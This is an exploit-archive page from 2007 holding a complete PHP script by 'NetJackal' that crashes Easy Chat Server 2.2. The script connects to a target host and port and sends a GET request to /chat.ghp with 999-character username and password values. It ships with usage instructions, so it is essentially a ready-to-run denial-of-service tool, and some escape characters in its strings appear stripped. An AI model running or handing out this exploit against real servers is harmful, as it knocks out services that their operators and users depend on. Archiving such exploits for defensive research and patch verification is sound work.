Easy Chat Server 2.2 Remote Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Easy Chat Server 2.2 Remote Denial of Service Exploit
# Published : 2007-08-14
# Author : NetJackal
# Previous Title : WireShark < 0.99.6 MMS Remote Denial of Service Exploit
# Next Title : WengoPhone 2.x SIP Phone Remote Denial of Service Exploit

<?php

##########################################################
###----------------------------------------------------###
###--------Easy Chat Server Remote DoS Exploit---------###
###----------------------------------------------------###
###-http://www.echatserver.com/------------------------###
###----------------------------------------------------###
###-Tested on version 2.2 [last version]-(XP SP2)------###
###----------------------------------------------------###
###-Usage:-php dos.php [TARGET] [PORT]-----------------###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################

/*
Description:
 Easy Chat Server has built-in web server let users
login to chat server. Login page allow Max 30 characters
length for Name & Password. If attacker inserts a long Name &
Password by editing or make his own login page, chat server
will crash.
*/
echo "Easy Chat Server Remote DoS Exploitnttttby NetJackal";
if($argc<2)die("nUsage:   php dos.php [TARGET] [PORT]nExample: php dos.php localhost 80n");
$host=$argv[1];
$port=$argv[2];
$A=str_repeat('A',999);
echo "nConnecting...";
$link=fsockopen($host,$port,$en,$es,30);
if(!$link)die("n$en: $es");
echo "nConnected!";
echo "nSending exploit...";
fputs($link,"GET /chat.ghp?username=$A&password=$A&room=1&sex=2 HTTP/1.1rnHost: $hostrnrn");
echo "nWell done!n";
?>

# www.Syue.com [2007-08-14]